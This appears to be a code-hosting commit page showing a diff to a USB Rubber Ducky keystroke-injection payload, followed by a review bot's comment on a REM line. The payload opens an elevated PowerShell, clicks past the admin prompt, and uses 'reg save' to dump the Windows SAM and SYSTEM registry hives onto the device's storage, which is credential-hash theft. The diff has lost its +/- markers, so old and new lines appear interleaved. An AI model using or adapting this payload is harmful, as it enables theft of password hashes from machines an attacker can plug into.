
2 Commits

Author SHA1 Message Date
Mavis Coffey 5036fd1b9f
Merge 61eb88ab6c into 675972662a 2024-10-22 14:42:24 -04:00
Mavis Coffey 61eb88ab6c
Update payload.txt 2024-10-22 14:41:32 -04:00
1 changed files with 10 additions and 6 deletions


@ -47,24 +47,28 @@ EXTENSION PASSIVE_WINDOWS_DETECT
END_IF
END_REM
END_EXTENSION
REM Change $DRIVELABEL to the storage label of your duck
DEFINE #DRIVELABEL DUCKY
IF ($_OS == WINDOWS) THEN
INJECT_MOD GUI R
GUI r
DELAY 500
STRING cmd
STRING powershell
DELAY 1000
CTRL-SHIFT-ENTER
DELAY 750
LEFT
ENTER
DELAY 1000
REM Change $DRIVELABEL to the storage label of your duck
DEFINE #DRIVELABEL D:
STRINGLN reg save HKLM\sam #DRIVELABEL/sam.save
STRINGLN $DriveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_LogicalDisk WHERE VolumeName='#DRIVELABEL'").DeviceID; Set-Variable -Name 'DriveLetter' -Value $DriveLetter -Scope Global; Write-Output $DriveLetter
DELAY 250
STRINGLN reg save HKLM\sam $DriveLetter/sam.save
WAIT_FOR_STORAGE_ACTIVITY
WAIT_FOR_STORAGE_INACTIVITY
STRINGLN reg save HKLM\system #DRIVELABEL/system.save
STRINGLN reg save HKLM\system $DriveLetter/system.save
WAIT_FOR_STORAGE_ACTIVITY
WAIT_FOR_STORAGE_INACTIVITY
ALT F4
ELSE
ATTACKMODE OFF
STOP_PAYLOAD
END_IF
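Review bot: The REM line above `DEFINE #DRIVELABEL DUCKY` still refers to `$DRIVELABEL`, although the constant is `#DRIVELABEL` and, judging by the `VolumeName='#DRIVELABEL'` query, it now holds a volume label rather than a drive letter like the old `D:` value. I would reword it to `REM #DRIVELABEL is the volume label of the duck's storage, not a drive letter`. The page has lost its +/- markers, so which REM/DEFINE pair is the new one is inferred from that query. The payload also has no REM describing its footprint: it appears to open an elevated PowerShell, run `reg save` on HKLM\sam and HKLM\system, and write sam.save and system.save to the removable volume. A line stating this would tell a reader which files to remove after a test and which command lines to look for in process-creation logs. The EXTENSION block and the rest of the file begin outside this hunk.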